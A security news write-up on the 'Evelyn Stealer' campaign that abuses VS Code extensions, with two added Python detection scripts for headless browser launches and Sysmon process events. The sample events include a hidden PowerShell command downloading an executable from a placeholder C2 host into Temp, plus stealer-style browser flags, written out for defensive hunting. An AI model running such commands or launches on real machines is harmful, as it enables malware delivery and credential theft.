A newly analyzed campaign dubbed “Evelyn Stealer” is turning the Visual Studio Code (VSC) extension ecosystem into an attack delivery platform, enabling threat actors to compromise software developers and pivot deeper into enterprise environments.
The campaign abuses seemingly legitimate extensions including a “Bitcoin Black” theme and a “Codo AI” coding assistant as the initial lure.
While they present as a cosmetic theme and a functional AI helper, both extensions contain hidden logic that executes PowerShell and batch scripts on activation, downloading and staging the malware in the background.
The operation, detailed by Koi Security and TrendAI researchers, chains malicious VSC extensions, DLL hijacking, process hollowing, and anti-analysis techniques into a mature multi-stage data theft pipeline that directly targets high-value developer workstations.
Once installed, the extensions deliver the legitimate Lightshot screenshot utility paired with a trojanized DLL, leveraging classic DLL hijacking to execute attacker-controlled code under the guise of a trusted binary.
The first-stage payload, Lightshot.dll, masquerades as a legitimate Lightshot component and is sideloaded by Lightshot.exe.
When loaded, the DLL immediately runs its own payload, exposing benign-looking exports to blend in and implementing a singleton-style mutex to ensure only one instance executes on each host.
It then spawns a hidden PowerShell command to retrieve a second-stage executable into the user’s Temp directory as “runtime.exe,” establishing the foundation for a deeper intrusion chain.
This second stage, identified as iknowyou.model, functions as a process-hollowing injector. It creates a suspended instance of the Windows process grpconv.exe and decrypts the embedded Evelyn Stealer payload using AES-256-CBC, with hardcoded key and IV values.
After decryption, the malware replaces the memory of the suspended grpconv.exe instance with the Evelyn Stealer code and resumes execution, allowing the final payload to operate inside a legitimate Windows process and evade basic behavioral and signature-based security controls.
Once active, Evelyn Stealer dynamically resolves Windows APIs for process injection, file and registry operations, network communication, and clipboard access.
The malware performs extensive environment checks, including GPU, hostname, disk size, process, and registry analysis, and incorporates virtual machine and debugger detection to avoid sandboxes and research environments.
If the system passes these checks, Evelyn creates its own working directory in the user’s AppData path and begins harvesting data at scale.
The stealer focuses heavily on browser-centric data theft and session hijacking. It restores and kills active browser processes, then launches new hidden browser instances (for example, Chrome or Edge) with a long list of flags such as “--headless=new,” “--no-sandbox,” “--disable-extensions,” “--disable-logging,” and off-screen, 1×1-pixel windows to minimize user visibility and forensic traces.
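As an added illustration (this is not code from the Koi Security or TrendAI report), the following Python scores a Chromium-family browser command line for the flag combination described above, so a process-creation feed can separate a CI screenshot run from the stealer's hidden 1×1 window. The four named flags and the 1×1 window come from the article; the indicator weights, the alert threshold, the browser process-name list, and the `--window-position` check for off-screen placement are assumptions of this example, as are the sample command lines.

```python
import re
import shlex
from pathlib import PureWindowsPath

# Indicator weights and the alert threshold are assumptions for this
# example; the four flags and the 1x1 window come from the article.
INDICATOR_WEIGHTS = {
    "headless": 3,
    "no-sandbox": 2,
    "disable-extensions": 1,
    "disable-logging": 1,
    "tiny-window": 3,       # --window-size=1,1 (the 1x1-pixel window)
    "offscreen-window": 3,  # --window-position with a negative coordinate (assumed flag)
}
ALERT_THRESHOLD = 6
# Chromium-family process names to inspect (assumed list).
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "brave.exe", "chromium.exe"}

_GEOMETRY = re.compile(r"^\s*(-?\d+)\s*,\s*(-?\d+)\s*$")


def parse_flags(cmdline):
    """Split a Windows command line into (image basename, {flag: value})."""
    # posix=False keeps backslashes in paths; quotes stay on the token.
    tokens = shlex.split(cmdline, posix=False)
    if not tokens:
        return "", {}
    image = PureWindowsPath(tokens[0].strip('"')).name.lower()
    flags = {}
    for tok in tokens[1:]:
        if not tok.startswith("--"):
            continue  # URLs and positional arguments are not flags
        name, _, value = tok[2:].partition("=")
        flags[name.lower()] = value.strip('"') if value else None
    return image, flags


def score_browser_launch(cmdline):
    """Return the matched indicators and whether the launch crosses the threshold."""
    image, flags = parse_flags(cmdline)
    hits = []
    if image in BROWSER_IMAGES:
        for name in ("headless", "no-sandbox", "disable-extensions", "disable-logging"):
            if name in flags:
                hits.append(name)
        size = _GEOMETRY.match(flags.get("window-size") or "")
        if size and int(size.group(1)) <= 1 and int(size.group(2)) <= 1:
            hits.append("tiny-window")
        pos = _GEOMETRY.match(flags.get("window-position") or "")
        if pos and (int(pos.group(1)) < 0 or int(pos.group(2)) < 0):
            hits.append("offscreen-window")
    score = sum(INDICATOR_WEIGHTS[h] for h in hits)
    return {"image": image, "indicators": hits, "score": score,
            "alert": score >= ALERT_THRESHOLD}


# Constructed sample command lines (not captured from the campaign).
SAMPLES = {
    "interactive": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default https://example.com',
    "ci_screenshot": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --disable-gpu --screenshot https://example.com',
    "stealer_like": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --no-sandbox --disable-extensions --disable-logging --window-size=1,1 --window-position=-32000,-32000',
}

if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        result = score_browser_launch(cmd)
        print(f"{label:14} score={result['score']:2} alert={result['alert']} {result['indicators']}")
```

A lone `--headless=new` stays below the threshold on purpose, since build agents and scrapers use it legitimately; it is the stacking of sandbox, extension and logging suppression with a 1×1 off-screen window that distinguishes the pattern in the article.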
A dedicated browser injection DLL, abe_decrypt.dll, is fetched from the Temp directory, the attacker’s FTP server, or the current working directory and injected to extract credentials, cookies, and session data.

Beyond browser data, Evelyn Stealer captures clipboard contents, stored Wi-Fi credentials, system information, installed software lists, running processes, VPN configuration, and multiple categories of cryptocurrency wallet data.
Collected artifacts are staged into a ZIP archive whose filename encodes rich context, including country, IP address, username, OS version, hardware information, and wallet-related flags, before being exfiltrated over FTP to attacker-controlled infrastructure.
Mitigations
The threat has clear implications for organizations that rely on VSC and third-party extensions across development, DevOps, and production environments.
Once the malware collects all the necessary information, it archives the data into a ZIP file and sends it to the attacker’s C&C server over FTP.

Compromised developer machines provide adversaries with direct access to source code, secrets, CI/CD pipelines, cloud consoles, and digital assets such as cryptocurrency.
The Evelyn campaign demonstrates how attackers are operationalizing trust in developer tools and marketplaces, iterating on social engineering themes (dark crypto-inspired themes, AI copilots) while refining their delivery chain.
Vendors such as TrendAI Vision One report detection and blocking coverage for Evelyn-related indicators of compromise and provide hunting queries and threat intelligence to help defenders identify malicious extensions, payloads, and C2 infrastructure.
For enterprises, the campaign underscores the urgency of treating developer environments as high-risk assets: enforcing strict extension vetting, monitoring for anomalous PowerShell and headless browser activity, hardening against DLL hijacking, and applying zero-trust principles to development and build systems.
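An added example (not the vendors' published hunting queries) of how the monitoring points in this paragraph can be written as rules over Sysmon-style process-creation (Event ID 1) and image-load (Event ID 7) records: an IDE process spawning a shell (the extension's activation script), Lightshot.exe spawning PowerShell (the sideloaded DLL fetching stage two), a hidden PowerShell download of an executable into Temp, and Lightshot.dll being loaded from a user-writable path. Field names follow Sysmon; the user-writable path heuristic, the hidden-window and download keyword lists, the extension folder, the C2 host, and the sample events are constructed assumptions of this example.

```python
import re
from pathlib import PureWindowsPath

# Process names involved in the chain the article describes.
IDE_IMAGES = {"code.exe"}                          # VS Code on Windows
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# The heuristics below are assumptions for this example, not from the report.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(?:appdata|downloads)\\", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
DOWNLOAD_CMD = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|start-bitstransfer|\bcurl\b|\bwget\b", re.I)
TEMP_EXE = re.compile(r"(?:\\temp\\|\$env:temp\\|%temp%\\)[^\s\"']+\.exe", re.I)


def _basename(path):
    return PureWindowsPath(path).name.lower() if path else ""


def evaluate(event):
    """Return the list of rule names a single Sysmon-style event matches."""
    findings = []
    image = _basename(event.get("Image"))
    if event.get("EventID") == 1:  # process creation
        parent = _basename(event.get("ParentImage"))
        cmd = event.get("CommandLine", "")
        if parent in IDE_IMAGES and image in SHELLS:
            findings.append("ide-spawned-shell")        # extension activation script
        if parent == "lightshot.exe" and image in SHELLS:
            findings.append("lightshot-spawned-shell")  # sideloaded DLL fetching stage two
        if (image in POWERSHELL and HIDDEN_WINDOW.search(cmd)
                and DOWNLOAD_CMD.search(cmd) and TEMP_EXE.search(cmd)):
            findings.append("hidden-download-to-temp")
    elif event.get("EventID") == 7:  # image (DLL) load
        dll = event.get("ImageLoaded", "")
        if (image == "lightshot.exe" and _basename(dll) == "lightshot.dll"
                and USER_WRITABLE.search(dll)):
            findings.append("lightshot-dll-from-user-path")
    return findings


def hunt(events):
    """Evaluate every event and return (RecordId, rule) pairs in event order."""
    return [(e["RecordId"], rule) for e in events for rule in evaluate(e)]


# Constructed sample events; paths, the extension folder and the C2 host are placeholders.
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "CommandLine": r"powershell.exe -WindowStyle Hidden -File C:\Users\dev\.vscode\extensions\EXTENSION_PLACEHOLDER\install.ps1"},
    {"RecordId": 2, "EventID": 7,
     "Image": r"C:\Users\dev\AppData\Local\Temp\Lightshot.exe",
     "ImageLoaded": r"C:\Users\dev\AppData\Local\Temp\Lightshot.dll"},
    {"RecordId": 3, "EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\dev\AppData\Local\Temp\Lightshot.exe",
     "CommandLine": r'powershell.exe -w hidden -c "Invoke-WebRequest -Uri http://C2_PLACEHOLDER/stage2 -OutFile $env:TEMP\runtime.exe"'},
    {"RecordId": 4, "EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile -Command Get-ChildItem"},
    {"RecordId": 5, "EventID": 7,
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll"},
]

if __name__ == "__main__":
    for record_id, rule in hunt(SAMPLE_EVENTS):
        print(f"record {record_id}: {rule}")
```

Each rule is deliberately narrow: an IDE spawning PowerShell is common enough in developer environments that it is a hunting lead rather than an alert on its own, whereas the chained findings on records 2 and 3 (a screenshot utility running from Temp, loading its DLL from Temp, and then pulling an executable into Temp from a hidden shell) match the delivery chain closely enough to warrant isolating the host.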
As AI-powered assistants and rich extension ecosystems proliferate in IDEs, similar campaigns weaponizing developer tooling are likely to accelerate, making proactive controls and continuous monitoring essential to protecting both code and critical business infrastructure.
